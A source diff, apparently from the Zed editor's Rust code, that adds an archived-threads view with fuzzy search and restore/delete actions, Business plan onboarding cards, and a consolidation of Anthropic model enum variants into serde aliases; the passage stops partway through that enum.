+ let query = self.filter_editor.read(cx).text(cx).to_lowercase();
+ let today = Local::now().naive_local().date();
+
+ let mut items = Vec::with_capacity(sessions.len() + 5);
+ let mut current_bucket: Option<TimeBucket> = None;
+
+ for session in sessions {
+ let highlight_positions = if !query.is_empty() {
+ let title = session.title.as_ref().map(|t| t.as_ref()).unwrap_or("");
+ match fuzzy_match_positions(&query, title) {
+ Some(positions) => positions,
+ None => continue,
+ }
+ } else {
+ Vec::new()
+ };
+
+ let entry_bucket = session
+ .updated_at
+ .map(|timestamp| {
+ let entry_date = timestamp.with_timezone(&Local).naive_local().date();
+ TimeBucket::from_dates(today, entry_date)
+ })
+ .unwrap_or(TimeBucket::Older);
+
+ if Some(entry_bucket) != current_bucket {
+ current_bucket = Some(entry_bucket);
+ items.push(ArchiveListItem::BucketSeparator(entry_bucket));
+ }
+
+ items.push(ArchiveListItem::Entry {
+ session,
+ highlight_positions,
+ });
+ }
+
+ self.list_state.reset(items.len());
+ self.items = items;
+ self.selection = None;
+ self.hovered_index = None;
+ cx.notify();
+ }
+
+ fn reset_filter_editor_text(&mut self, window: &mut Window, cx: &mut Context<Self>) {
+ self.filter_editor.update(cx, |editor, cx| {
+ editor.set_text("", window, cx);
+ });
+ }
+
+ fn unarchive_thread(
+ &mut self,
+ session_info: AgentSessionInfo,
+ window: &mut Window,
+ cx: &mut Context<Self>,
+ ) {
+ self.selection = None;
+ self.reset_filter_editor_text(window, cx);
+ cx.emit(ThreadsArchiveViewEvent::Unarchive {
+ agent: self.selected_agent.clone(),
+ session_info,
+ });
+ }
+
+ fn delete_thread(&mut self, session_id: &acp::SessionId, cx: &mut Context<Self>) {
+ let Some(history) = &self.history else {
+ return;
+ };
+ if !history.read(cx).supports_delete() {
+ return;
+ }
+ let session_id = session_id.clone();
+ history.update(cx, |history, cx| {
+ history
+ .delete_session(&session_id, cx)
+ .detach_and_log_err(cx);
+ });
+ }
+
+ fn remove_selected_thread(
+ &mut self,
+ _: &RemoveSelectedThread,
+ _window: &mut Window,
+ cx: &mut Context<Self>,
+ ) {
+ let Some(ix) = self.selection else {
+ return;
+ };
+ let Some(ArchiveListItem::Entry { session, .. }) = self.items.get(ix) else {
+ return;
+ };
+ let session_id = session.session_id.clone();
+ self.delete_thread(&session_id, cx);
+ }
+
+ fn is_selectable_item(&self, ix: usize) -> bool {
+ matches!(self.items.get(ix), Some(ArchiveListItem::Entry { .. }))
+ }
+
+ fn find_next_selectable(&self, start: usize) -> Option<usize> {
+ (start..self.items.len()).find(|&i| self.is_selectable_item(i))
+ }
+
+ fn find_previous_selectable(&self, start: usize) -> Option<usize> {
+ (0..=start).rev().find(|&i| self.is_selectable_item(i))
+ }
+
+ fn editor_move_down(&mut self, _: &MoveDown, window: &mut Window, cx: &mut Context<Self>) {
+ self.select_next(&SelectNext, window, cx);
+ if self.selection.is_some() {
+ self.focus_handle.focus(window, cx);
+ }
+ }
+
+ fn editor_move_up(&mut self, _: &MoveUp, window: &mut Window, cx: &mut Context<Self>) {
+ self.select_previous(&SelectPrevious, window, cx);
+ if self.selection.is_some() {
+ self.focus_handle.focus(window, cx);
+ }
+ }
+
+ fn select_next(&mut self, _: &SelectNext, _window: &mut Window, cx: &mut Context<Self>) {
+ let next = match self.selection {
+ Some(ix) => self.find_next_selectable(ix + 1),
+ None => self.find_next_selectable(0),
+ };
+ if let Some(next) = next {
+ self.selection = Some(next);
+ self.list_state.scroll_to_reveal_item(next);
+ cx.notify();
+ }
+ }
+
+ fn select_previous(&mut self, _: &SelectPrevious, window: &mut Window, cx: &mut Context<Self>) {
+ match self.selection {
+ Some(ix) => {
+ if let Some(prev) = (ix > 0)
+ .then(|| self.find_previous_selectable(ix - 1))
+ .flatten()
+ {
+ self.selection = Some(prev);
+ self.list_state.scroll_to_reveal_item(prev);
+ } else {
+ self.selection = None;
+ self.focus_filter_editor(window, cx);
+ }
+ cx.notify();
+ }
+ None => {
+ let last = self.items.len().saturating_sub(1);
+ if let Some(prev) = self.find_previous_selectable(last) {
+ self.selection = Some(prev);
+ self.list_state.scroll_to_reveal_item(prev);
+ cx.notify();
+ }
+ }
+ }
+ }
+
+ fn select_first(&mut self, _: &SelectFirst, _window: &mut Window, cx: &mut Context<Self>) {
+ if let Some(first) = self.find_next_selectable(0) {
+ self.selection = Some(first);
+ self.list_state.scroll_to_reveal_item(first);
+ cx.notify();
+ }
+ }
+
+ fn select_last(&mut self, _: &SelectLast, _window: &mut Window, cx: &mut Context<Self>) {
+ let last = self.items.len().saturating_sub(1);
+ if let Some(last) = self.find_previous_selectable(last) {
+ self.selection = Some(last);
+ self.list_state.scroll_to_reveal_item(last);
+ cx.notify();
+ }
+ }
+
+ fn confirm(&mut self, _: &Confirm, window: &mut Window, cx: &mut Context<Self>) {
+ let Some(ix) = self.selection else { return };
+ let Some(ArchiveListItem::Entry { session, .. }) = self.items.get(ix) else {
+ return;
+ };
+
+ let can_unarchive = session.work_dirs.as_ref().is_some_and(|p| !p.is_empty());
+ if !can_unarchive {
+ return;
+ }
+
+ self.unarchive_thread(session.clone(), window, cx);
+ }
+
+ fn render_list_entry(
+ &mut self,
+ ix: usize,
+ _window: &mut Window,
+ cx: &mut Context<Self>,
+ ) -> AnyElement {
+ let Some(item) = self.items.get(ix) else {
+ return div().into_any_element();
+ };
+
+ match item {
+ ArchiveListItem::BucketSeparator(bucket) => div()
+ .w_full()
+ .px_2p5()
+ .pt_3()
+ .pb_1()
+ .child(
+ Label::new(bucket.label())
+ .size(LabelSize::Small)
+ .color(Color::Muted),
+ )
+ .into_any_element(),
+ ArchiveListItem::Entry {
+ session,
+ highlight_positions,
+ } => {
+ let id = SharedString::from(format!("archive-entry-{}", ix));
+
+ let is_focused = self.selection == Some(ix);
+ let hovered = self.hovered_index == Some(ix);
+
+ let project_names = session.work_dirs.as_ref().and_then(|paths| {
+ let paths_str = paths
+ .paths()
+ .iter()
+ .filter_map(|p| p.file_name())
+ .filter_map(|name| name.to_str())
+ .join(", ");
+ if paths_str.is_empty() {
+ None
+ } else {
+ Some(paths_str)
+ }
+ });
+
+ let can_unarchive = session.work_dirs.as_ref().is_some_and(|p| !p.is_empty());
+
+ let supports_delete = self
+ .history
+ .as_ref()
+ .map(|h| h.read(cx).supports_delete())
+ .unwrap_or(false);
+
+ let title: SharedString =
+ session.title.clone().unwrap_or_else(|| "Untitled".into());
+
+ let session_info = session.clone();
+ let session_id_for_delete = session.session_id.clone();
+ let focus_handle = self.focus_handle.clone();
+
+ let timestamp = session
+ .created_at
+ .or(session.updated_at)
+ .map(format_history_entry_timestamp);
+
+ let highlight_positions = highlight_positions.clone();
+ let title_label = if highlight_positions.is_empty() {
+ Label::new(title).truncate().flex_1().into_any_element()
+ } else {
+ HighlightedLabel::new(title, highlight_positions)
+ .truncate()
+ .flex_1()
+ .into_any_element()
+ };
+
+ h_flex()
+ .id(id)
+ .min_w_0()
+ .w_full()
+ .px(DynamicSpacing::Base06.rems(cx))
+ .border_1()
+ .map(|this| {
+ if is_focused {
+ this.border_color(cx.theme().colors().border_focused)
+ } else {
+ this.border_color(gpui::transparent_black())
+ }
+ })
+ .on_hover(cx.listener(move |this, is_hovered, _window, cx| {
+ if *is_hovered {
+ this.hovered_index = Some(ix);
+ } else if this.hovered_index == Some(ix) {
+ this.hovered_index = None;
+ }
+ cx.notify();
+ }))
+ .child(
+ v_flex()
+ .min_w_0()
+ .w_full()
+ .p_1()
+ .child(
+ h_flex()
+ .min_w_0()
+ .w_full()
+ .gap_1()
+ .justify_between()
+ .child(title_label)
+ .when(hovered || is_focused, |this| {
+ this.child(
+ h_flex()
+ .gap_0p5()
+ .when(can_unarchive, |this| {
+ this.child(
+ Button::new("unarchive-thread", "Restore")
+ .style(ButtonStyle::Filled)
+ .label_size(LabelSize::Small)
+ .when(is_focused, |this| {
+ this.key_binding(
+ KeyBinding::for_action_in(
+ &menu::Confirm,
+ &focus_handle,
+ cx,
+ )
+ .map(|kb| {
+ kb.size(rems_from_px(12.))
+ }),
+ )
+ })
+ .on_click(cx.listener(
+ move |this, _, window, cx| {
+ this.unarchive_thread(
+ session_info.clone(),
+ window,
+ cx,
+ );
+ },
+ )),
+ )
+ })
+ .when(supports_delete, |this| {
+ this.child(
+ IconButton::new(
+ "delete-thread",
+ IconName::Trash,
+ )
+ .style(ButtonStyle::Filled)
+ .icon_size(IconSize::Small)
+ .icon_color(Color::Muted)
+ .tooltip({
+ move |_window, cx| {
+ Tooltip::for_action_in(
+ "Delete Thread",
+ &RemoveSelectedThread,
+ &focus_handle,
+ cx,
+ )
+ }
+ })
+ .on_click(cx.listener(
+ move |this, _, _, cx| {
+ this.delete_thread(
+ &session_id_for_delete,
+ cx,
+ );
+ cx.stop_propagation();
+ },
+ )),
+ )
+ }),
+ )
+ }),
+ )
+ .child(
+ h_flex()
+ .gap_1()
+ .when_some(timestamp, |this, ts| {
+ this.child(
+ Label::new(ts)
+ .size(LabelSize::Small)
+ .color(Color::Muted),
+ )
+ })
+ .when_some(project_names, |this, project| {
+ this.child(
+ Label::new("•")
+ .size(LabelSize::Small)
+ .color(Color::Muted)
+ .alpha(0.5),
+ )
+ .child(
+ Label::new(project)
+ .size(LabelSize::Small)
+ .color(Color::Muted),
+ )
+ }),
+ ),
+ )
+ .into_any_element()
+ }
+ }
+ }
+
+ fn render_agent_picker(&self, cx: &mut Context<Self>) -> PopoverMenu<ContextMenu> {
+ let agent_server_store = self.agent_server_store.clone();
+
+ let (chevron_icon, icon_color) = if self.selected_agent_menu.is_deployed() {
+ (IconName::ChevronUp, Color::Accent)
+ } else {
+ (IconName::ChevronDown, Color::Muted)
+ };
+
+ let selected_agent_icon = if let Agent::Custom { id } = &self.selected_agent {
+ let store = agent_server_store.read(cx);
+ let icon = store.agent_icon(&id);
+
+ if let Some(icon) = icon {
+ Icon::from_external_svg(icon)
+ } else {
+ Icon::new(IconName::Sparkle)
+ }
+ .color(Color::Muted)
+ .size(IconSize::Small)
+ } else {
+ Icon::new(IconName::ZedAgent)
+ .color(Color::Muted)
+ .size(IconSize::Small)
+ };
+
+ let this = cx.weak_entity();
+
+ PopoverMenu::new("agent_history_menu")
+ .trigger(
+ ButtonLike::new("selected_agent")
+ .selected_style(ButtonStyle::Tinted(TintColor::Accent))
+ .child(
+ h_flex().gap_1().child(selected_agent_icon).child(
+ Icon::new(chevron_icon)
+ .color(icon_color)
+ .size(IconSize::XSmall),
+ ),
+ ),
+ )
+ .menu(move |window, cx| {
+ Some(ContextMenu::build(window, cx, |menu, _window, cx| {
+ menu.item(
+ ContextMenuEntry::new("Zed Agent")
+ .icon(IconName::ZedAgent)
+ .icon_color(Color::Muted)
+ .handler({
+ let this = this.clone();
+ move |window, cx| {
+ this.update(cx, |this, cx| {
+ this.set_selected_agent(Agent::NativeAgent, window, cx)
+ })
+ .ok();
+ }
+ }),
+ )
+ .separator()
+ .map(|mut menu| {
+ let agent_server_store = agent_server_store.read(cx);
+ let registry_store = project::AgentRegistryStore::try_global(cx);
+ let registry_store_ref = registry_store.as_ref().map(|s| s.read(cx));
+
+ struct AgentMenuItem {
+ id: AgentId,
+ display_name: SharedString,
+ }
+
+ let agent_items = agent_server_store
+ .external_agents()
+ .map(|agent_id| {
+ let display_name = agent_server_store
+ .agent_display_name(agent_id)
+ .or_else(|| {
+ registry_store_ref
+ .as_ref()
+ .and_then(|store| store.agent(agent_id))
+ .map(|a| a.name().clone())
+ })
+ .unwrap_or_else(|| agent_id.0.clone());
+ AgentMenuItem {
+ id: agent_id.clone(),
+ display_name,
+ }
+ })
+ .sorted_unstable_by_key(|e| e.display_name.to_lowercase())
+ .collect::<Vec<_>>();
+
+ for item in &agent_items {
+ let mut entry = ContextMenuEntry::new(item.display_name.clone());
+
+ let icon_path = agent_server_store.agent_icon(&item.id).or_else(|| {
+ registry_store_ref
+ .as_ref()
+ .and_then(|store| store.agent(&item.id))
+ .and_then(|a| a.icon_path().cloned())
+ });
+
+ if let Some(icon_path) = icon_path {
+ entry = entry.custom_icon_svg(icon_path);
+ } else {
+ entry = entry.icon(IconName::ZedAgent);
+ }
+
+ entry = entry.icon_color(Color::Muted).handler({
+ let this = this.clone();
+ let agent = Agent::Custom {
+ id: item.id.clone(),
+ };
+ move |window, cx| {
+ this.update(cx, |this, cx| {
+ this.set_selected_agent(agent.clone(), window, cx)
+ })
+ .ok();
+ }
+ });
+
+ menu = menu.item(entry);
+ }
+ menu
+ })
+ }))
+ })
+ .with_handle(self.selected_agent_menu.clone())
+ .anchor(gpui::Corner::TopRight)
+ .offset(gpui::Point {
+ x: px(1.0),
+ y: px(1.0),
+ })
+ }
+
+ fn render_header(&self, window: &Window, cx: &mut Context<Self>) -> impl IntoElement {
+ let has_query = !self.filter_editor.read(cx).text(cx).is_empty();
+ let traffic_lights = cfg!(target_os = "macos") && !window.is_fullscreen();
+ let header_height = platform_title_bar_height(window);
+ let show_focus_keybinding =
+ self.selection.is_some() && !self.filter_editor.focus_handle(cx).is_focused(window);
+
+ h_flex()
+ .h(header_height)
+ .mt_px()
+ .pb_px()
+ .when(traffic_lights, |this| {
+ this.pl(px(ui::utils::TRAFFIC_LIGHT_PADDING))
+ })
+ .pr_1p5()
+ .gap_1()
+ .justify_between()
+ .border_b_1()
+ .border_color(cx.theme().colors().border)
+ .child(Divider::vertical().color(ui::DividerColor::Border))
+ .child(
+ h_flex()
+ .ml_1()
+ .min_w_0()
+ .w_full()
+ .gap_1()
+ .child(
+ Icon::new(IconName::MagnifyingGlass)
+ .size(IconSize::Small)
+ .color(Color::Muted),
+ )
+ .child(self.filter_editor.clone()),
+ )
+ .when(show_focus_keybinding, |this| {
+ this.child(KeyBinding::for_action(&FocusSidebarFilter, cx))
+ })
+ .when(!has_query && !show_focus_keybinding, |this| {
+ this.child(self.render_agent_picker(cx))
+ })
+ .when(has_query, |this| {
+ this.child(
+ IconButton::new("clear_filter", IconName::Close)
+ .icon_size(IconSize::Small)
+ .tooltip(Tooltip::text("Clear Search"))
+ .on_click(cx.listener(|this, _, window, cx| {
+ this.reset_filter_editor_text(window, cx);
+ this.update_items(cx);
+ })),
+ )
+ })
+ }
+}
+
+pub fn format_history_entry_timestamp(entry_time: DateTime<Utc>) -> String {
+ let now = Utc::now();
+ let duration = now.signed_duration_since(entry_time);
+
+ let minutes = duration.num_minutes();
+ let hours = duration.num_hours();
+ let days = duration.num_days();
+ let weeks = days / 7;
+ let months = days / 30;
+
+ if minutes < 60 {
+ format!("{}m", minutes.max(1))
+ } else if hours < 24 {
+ format!("{}h", hours.max(1))
+ } else if days < 7 {
+ format!("{}d", days.max(1))
+ } else if weeks < 4 {
+ format!("{}w", weeks.max(1))
+ } else {
+ format!("{}mo", months.max(1))
+ }
+}
+
+impl Focusable for ThreadsArchiveView {
+ fn focus_handle(&self, _cx: &App) -> FocusHandle {
+ self.focus_handle.clone()
+ }
+}
+
+impl ThreadsArchiveView {
+ fn empty_state_message(&self, is_empty: bool, has_query: bool) -> Option<&'static str> {
+ archive_empty_state_message(self.history.is_some(), is_empty, has_query)
+ }
+}
+
+impl Render for ThreadsArchiveView {
+ fn render(&mut self, window: &mut Window, cx: &mut Context<Self>) -> impl IntoElement {
+ let is_empty = self.items.is_empty();
+ let has_query = !self.filter_editor.read(cx).text(cx).is_empty();
+
+ let content = if self.is_loading {
+ v_flex()
+ .flex_1()
+ .justify_center()
+ .items_center()
+ .child(
+ Icon::new(IconName::LoadCircle)
+ .size(IconSize::Small)
+ .color(Color::Muted)
+ .with_rotate_animation(2),
+ )
+ .into_any_element()
+ } else if let Some(message) = self.empty_state_message(is_empty, has_query) {
+ v_flex()
+ .flex_1()
+ .justify_center()
+ .items_center()
+ .child(
+ Label::new(message)
+ .size(LabelSize::Small)
+ .color(Color::Muted),
+ )
+ .into_any_element()
+ } else {
+ v_flex()
+ .flex_1()
+ .overflow_hidden()
+ .child(
+ list(
+ self.list_state.clone(),
+ cx.processor(Self::render_list_entry),
+ )
+ .flex_1()
+ .size_full(),
+ )
+ .vertical_scrollbar_for(&self.list_state, window, cx)
+ .into_any_element()
+ };
+
+ v_flex()
+ .key_context("ThreadsArchiveView")
+ .track_focus(&self.focus_handle)
+ .on_action(cx.listener(Self::select_next))
+ .on_action(cx.listener(Self::select_previous))
+ .on_action(cx.listener(Self::editor_move_down))
+ .on_action(cx.listener(Self::editor_move_up))
+ .on_action(cx.listener(Self::select_first))
+ .on_action(cx.listener(Self::select_last))
+ .on_action(cx.listener(Self::confirm))
+ .on_action(cx.listener(Self::remove_selected_thread))
+ .size_full()
+ .child(self.render_header(window, cx))
+ .child(content)
+ }
+}
+
+#[cfg(test)]
+mod tests {
+ use super::archive_empty_state_message;
+
+ #[test]
+ fn empty_state_message_returns_none_when_archive_has_items() {
+ assert_eq!(archive_empty_state_message(false, false, false), None);
+ assert_eq!(archive_empty_state_message(true, false, true), None);
+ }
+
+ #[test]
+ fn empty_state_message_distinguishes_unsupported_history() {
+ assert_eq!(
+ archive_empty_state_message(false, true, false),
+ Some("This agent does not support viewing archived threads.")
+ );
+ assert_eq!(
+ archive_empty_state_message(false, true, true),
+ Some("This agent does not support viewing archived threads.")
+ );
+ }
+
+ #[test]
+ fn empty_state_message_distinguishes_empty_history_and_search_results() {
+ assert_eq!(
+ archive_empty_state_message(true, true, false),
+ Some("No archived threads yet.")
+ );
+ assert_eq!(
+ archive_empty_state_message(true, true, true),
+ Some("No threads match your search.")
+ );
+ }
+}
@@ -1,8 +1,8 @@
+use agent_servers::GEMINI_ID;
use gpui::{
ClickEvent, DismissEvent, Entity, EventEmitter, FocusHandle, Focusable, MouseDownEvent, Render,
linear_color_stop, linear_gradient,
};
-use project::agent_server_store::GEMINI_NAME;
use ui::{TintColor, Vector, VectorName, prelude::*};
use workspace::{ModalView, Workspace};
@@ -39,7 +39,7 @@ impl AcpOnboardingModal {
panel.update(cx, |panel, cx| {
panel.new_agent_thread(
AgentType::Custom {
- name: GEMINI_NAME.into(),
+ id: GEMINI_ID.into(),
},
window,
cx,
@@ -193,15 +193,16 @@ impl Render for AcpOnboardingModal {
let copy = "Bring the agent of your choice to Zed via our new Agent Client Protocol (ACP), starting with Google's Gemini CLI integration.";
let open_panel_button = Button::new("open-panel", "Start with Gemini CLI")
- .icon_size(IconSize::Indicator)
.style(ButtonStyle::Tinted(TintColor::Accent))
.full_width()
.on_click(cx.listener(Self::open_panel));
let docs_button = Button::new("add-other-agents", "Add Other Agents")
- .icon(IconName::ArrowUpRight)
- .icon_size(IconSize::Indicator)
- .icon_color(Color::Muted)
+ .end_icon(
+ Icon::new(IconName::ArrowUpRight)
+ .size(IconSize::Indicator)
+ .color(Color::Muted),
+ )
.full_width()
.on_click(cx.listener(Self::open_agent_registry));
@@ -1,8 +1,8 @@
+use agent_servers::CLAUDE_AGENT_ID;
use gpui::{
ClickEvent, DismissEvent, Entity, EventEmitter, FocusHandle, Focusable, MouseDownEvent, Render,
linear_color_stop, linear_gradient,
};
-use project::agent_server_store::CLAUDE_AGENT_NAME;
use ui::{TintColor, Vector, VectorName, prelude::*};
use workspace::{ModalView, Workspace};
@@ -39,7 +39,7 @@ impl ClaudeCodeOnboardingModal {
panel.update(cx, |panel, cx| {
panel.new_agent_thread(
AgentType::Custom {
- name: CLAUDE_AGENT_NAME.into(),
+ id: CLAUDE_AGENT_ID.into(),
},
window,
cx,
@@ -201,15 +201,16 @@ impl Render for ClaudeCodeOnboardingModal {
let copy = "Powered by the Agent Client Protocol, you can now run Claude Agent as\na first-class citizen in Zed's agent panel.";
let open_panel_button = Button::new("open-panel", "Start with Claude Agent")
- .icon_size(IconSize::Indicator)
.style(ButtonStyle::Tinted(TintColor::Accent))
.full_width()
.on_click(cx.listener(Self::open_panel));
let docs_button = Button::new("add-other-agents", "Add Other Agents")
- .icon(IconName::ArrowUpRight)
- .icon_size(IconSize::Indicator)
- .icon_color(Color::Muted)
+ .end_icon(
+ Icon::new(IconName::ArrowUpRight)
+ .size(IconSize::Indicator)
+ .color(Color::Muted),
+ )
.full_width()
.on_click(cx.listener(Self::view_docs));
@@ -4,20 +4,31 @@ use ui::{prelude::*, render_modifiers};
#[derive(IntoElement)]
pub struct HoldForDefault {
is_default: bool,
+ more_content: bool,
}
impl HoldForDefault {
pub fn new(is_default: bool) -> Self {
- Self { is_default }
+ Self {
+ is_default,
+ more_content: true,
+ }
+ }
+
+ pub fn more_content(mut self, more_content: bool) -> Self {
+ self.more_content = more_content;
+ self
}
}
impl RenderOnce for HoldForDefault {
fn render(self, _window: &mut Window, cx: &mut App) -> impl IntoElement {
h_flex()
- .pt_1()
- .border_t_1()
- .border_color(cx.theme().colors().border_variant)
+ .when(self.more_content, |this| {
+ this.pt_1()
+ .border_t_1()
+ .border_color(cx.theme().colors().border_variant)
+ })
.gap_0p5()
.text_sm()
.text_color(Color::Muted.color(cx))
@@ -13,6 +13,8 @@ use theme::ThemeSettings;
use ui::{ButtonLike, TintColor, Tooltip, prelude::*};
use workspace::{OpenOptions, Workspace};
+use crate::Agent;
+
#[derive(IntoElement)]
pub struct MentionCrease {
id: ElementId,
@@ -187,7 +189,8 @@ fn open_mention_uri(
| MentionUri::Selection { abs_path: None, .. }
| MentionUri::Diagnostics { .. }
| MentionUri::TerminalSelection { .. }
- | MentionUri::GitDiff { .. } => {}
+ | MentionUri::GitDiff { .. }
+ | MentionUri::MergeConflict { .. } => {}
});
}
@@ -274,8 +277,17 @@ fn open_thread(
return;
};
+ // Right now we only support loading threads in the native agent
panel.update(cx, |panel, cx| {
- panel.load_agent_thread(id, None, Some(name.into()), window, cx)
+ panel.load_agent_thread(
+ Agent::NativeAgent,
+ id,
+ None,
+ Some(name.into()),
+ true,
+ window,
+ cx,
+ )
});
}
@@ -266,6 +266,20 @@ impl ZedAiOnboarding {
.into_any_element()
}
+ fn render_business_plan_state(&self, _cx: &mut App) -> AnyElement {
+ v_flex()
+ .gap_1()
+ .child(Headline::new("Welcome to Zed Business"))
+ .child(
+ Label::new("Here's what you get:")
+ .color(Color::Muted)
+ .mb_2(),
+ )
+ .child(PlanDefinitions.business_plan())
+ .children(self.render_dismiss_button())
+ .into_any_element()
+ }
+
fn render_student_plan_state(&self, _cx: &mut App) -> AnyElement {
v_flex()
.gap_1()
@@ -289,6 +303,7 @@ impl RenderOnce for ZedAiOnboarding {
Some(Plan::ZedFree) => self.render_free_plan_state(cx),
Some(Plan::ZedProTrial) => self.render_trial_state(cx),
Some(Plan::ZedPro) => self.render_pro_plan_state(cx),
+ Some(Plan::ZedBusiness) => self.render_business_plan_state(cx),
Some(Plan::ZedStudent) => self.render_student_plan_state(cx),
}
} else {
@@ -353,6 +368,14 @@ impl Component for ZedAiOnboarding {
"Pro Plan",
onboarding(SignInStatus::SignedIn, Some(Plan::ZedPro), false),
),
+ single_example(
+ "Business Plan",
+ onboarding(SignInStatus::SignedIn, Some(Plan::ZedBusiness), false),
+ ),
+ single_example(
+ "Student Plan",
+ onboarding(SignInStatus::SignedIn, Some(Plan::ZedStudent), false),
+ ),
])
.into_any_element(),
)
@@ -250,6 +250,15 @@ impl RenderOnce for AiUpsellCard {
.mb_2(),
)
.child(PlanDefinitions.pro_plan()),
+ Some(Plan::ZedBusiness) => card
+ .child(certified_user_stamp)
+ .child(Label::new("You're in the Zed Business plan").size(LabelSize::Large))
+ .child(
+ Label::new("Here's what you get:")
+ .color(Color::Muted)
+ .mb_2(),
+ )
+ .child(PlanDefinitions.business_plan()),
Some(Plan::ZedStudent) => card
.child(certified_user_stamp)
.child(Label::new("You're in the Zed Student plan").size(LabelSize::Large))
@@ -368,6 +377,28 @@ impl Component for AiUpsellCard {
}
.into_any_element(),
),
+ single_example(
+ "Business Plan",
+ AiUpsellCard {
+ sign_in_status: SignInStatus::SignedIn,
+ sign_in: Arc::new(|_, _| {}),
+ account_too_young: false,
+ user_plan: Some(Plan::ZedBusiness),
+ tab_index: Some(1),
+ }
+ .into_any_element(),
+ ),
+ single_example(
+ "Student Plan",
+ AiUpsellCard {
+ sign_in_status: SignInStatus::SignedIn,
+ sign_in: Arc::new(|_, _| {}),
+ account_too_young: false,
+ user_plan: Some(Plan::ZedStudent),
+ tab_index: Some(1),
+ }
+ .into_any_element(),
+ ),
],
))
.into_any_element(),
@@ -36,6 +36,12 @@ impl PlanDefinitions {
.child(ListBulletItem::new("Usage-based billing beyond $5"))
}
+ pub fn business_plan(&self) -> impl IntoElement {
+ List::new()
+ .child(ListBulletItem::new("Unlimited edit predictions"))
+ .child(ListBulletItem::new("Usage-based billing"))
+ }
+
pub fn student_plan(&self) -> impl IntoElement {
List::new()
.child(ListBulletItem::new("Unlimited edit predictions"))
@@ -23,7 +23,6 @@ http_client.workspace = true
schemars = { workspace = true, optional = true }
serde.workspace = true
serde_json.workspace = true
-settings.workspace = true
strum.workspace = true
thiserror.workspace = true
@@ -8,7 +8,6 @@ use futures::{AsyncBufReadExt, AsyncReadExt, StreamExt, io::BufReader, stream::B
use http_client::http::{self, HeaderMap, HeaderValue};
use http_client::{AsyncBody, HttpClient, Method, Request as HttpRequest, StatusCode};
use serde::{Deserialize, Serialize};
-pub use settings::{AnthropicAvailableModel as AvailableModel, ModelMode};
use strum::{EnumIter, EnumString};
use thiserror::Error;
@@ -34,116 +33,84 @@ pub enum AnthropicModelMode {
Thinking {
budget_tokens: Option<u32>,
},
-}
-
-impl From<ModelMode> for AnthropicModelMode {
- fn from(value: ModelMode) -> Self {
- match value {
- ModelMode::Default => AnthropicModelMode::Default,
- ModelMode::Thinking { budget_tokens } => AnthropicModelMode::Thinking { budget_tokens },
- }
- }
-}
-
-impl From<AnthropicModelMode> for ModelMode {
- fn from(value: AnthropicModelMode) -> Self {
- match value {
- AnthropicModelMode::Default => ModelMode::Default,
- AnthropicModelMode::Thinking { budget_tokens } => ModelMode::Thinking { budget_tokens },
- }
- }
+ AdaptiveThinking,
}
#[cfg_attr(feature = "schemars", derive(schemars::JsonSchema))]
#[derive(Clone, Debug, Default, Serialize, Deserialize, PartialEq, EnumIter)]
pub enum Model {
- #[serde(rename = "claude-opus-4", alias = "claude-opus-4-latest")]
- ClaudeOpus4,
- #[serde(rename = "claude-opus-4-1", alias = "claude-opus-4-1-latest")]
- ClaudeOpus4_1,
#[serde(
- rename = "claude-opus-4-thinking",
+ rename = "claude-opus-4",
+ alias = "claude-opus-4-latest",
+ alias = "claude-opus-4-thinking",
alias = "claude-opus-4-thinking-latest"
)]
- ClaudeOpus4Thinking,
+ ClaudeOpus4,
#[serde(
- rename = "claude-opus-4-1-thinking",
+ rename = "claude-opus-4-1",
+ alias = "claude-opus-4-1-latest",
+ alias = "claude-opus-4-1-thinking",
alias = "claude-opus-4-1-thinking-latest"
)]
- ClaudeOpus4_1Thinking,
- #[serde(rename = "claude-opus-4-5", alias = "claude-opus-4-5-latest")]
- ClaudeOpus4_5,
+ ClaudeOpus4_1,
#[serde(
- rename = "claude-opus-4-5-thinking",
+ rename = "claude-opus-4-5",
+ alias = "claude-opus-4-5-latest",
+ alias = "claude-opus-4-5-thinking",
alias = "claude-opus-4-5-thinking-latest"
)]
- ClaudeOpus4_5Thinking,
- #[serde(rename = "claude-opus-4-6", alias = "claude-opus-4-6-latest")]
- ClaudeOpus4_6,
- #[serde(
- rename = "claude-opus-4-6-thinking",
- alias = "claude-opus-4-6-thinking-latest"
- )]
- ClaudeOpus4_6Thinking,
- #[serde(
- rename = "claude-opus-4-6-1m-context",
- alias = "claude-opus-4-6-1m-context-latest"
- )]
- ClaudeOpus4_6_1mContext,
+ ClaudeOpus4_5,
#[serde(
- rename = "claude-opus-4-6-1m-context-thinking",
+ rename = "claude-opus-4-6",
+ alias = "claude-opus-4-6-latest",
+ alias = "claude-opus-4-6-1m-context",
+ alias = "claude-opus-4-6-1m-context-latest",
+ alias = "claude-opus-4-6-thinking",
+ alias = "claude-opus-4-6-thinking-latest",
+ alias = "claude-opus-4-6-1m-context-thinking",
alias = "claude-opus-4-6-1m-context-thinking-latest"
)]
- ClaudeOpus4_6_1mContextThinking,
- #[serde(rename = "claude-sonnet-4", alias = "claude-sonnet-4-latest")]
- ClaudeSonnet4,
+ ClaudeOpus4_6,
#[serde(
- rename = "claude-sonnet-4-thinking",
+ rename = "claude-sonnet-4",
+ alias = "claude-sonnet-4-latest",
+ alias = "claude-sonnet-4-thinking",
alias = "claude-sonnet-4-thinking-latest"
)]
- ClaudeSonnet4Thinking,
- #[serde(rename = "claude-sonnet-4-5", alias = "claude-sonnet-4-5-latest")]
- ClaudeSonnet4_5,
+ ClaudeSonnet4,
#[serde(
- rename = "claude-sonnet-4-5-thinking",
+ rename = "claude-sonnet-4-5",
+ alias = "claude-sonnet-4-5-latest",
+ alias = "claude-sonnet-4-5-thinking",
alias = "claude-sonnet-4-5-thinking-latest"
)]
- ClaudeSonnet4_5Thinking,
+ ClaudeSonnet4_5,
#[serde(
rename = "claude-sonnet-4-5-1m-context",
- alias = "claude-sonnet-4-5-1m-context-latest"
- )]
- ClaudeSonnet4_5_1mContext,
- #[serde(
- rename = "claude-sonnet-4-5-1m-context-thinking",
+ alias = "claude-sonnet-4-5-1m-context-latest",
+ alias = "claude-sonnet-4-5-1m-context-thinking",
alias = "claude-sonnet-4-5-1m-context-thinking-latest"
)]
- ClaudeSonnet4_5_1mContextThinking,
+ ClaudeSonnet4_5_1mContext,
#[default]
- #[serde(rename = "claude-sonnet-4-6", alias = "claude-sonnet-4-6-latest")]
- ClaudeSonnet4_6,
#[serde(
- rename = "claude-sonnet-4-6-thinking",
- alias = "claude-sonnet-4-6-thinking-latest"
- )]
- ClaudeSonnet4_6Thinking,
- #[serde(
- rename = "claude-sonnet-4-6-1m-context",
- alias = "claude-sonnet-4-6-1m-context-latest"
- )]
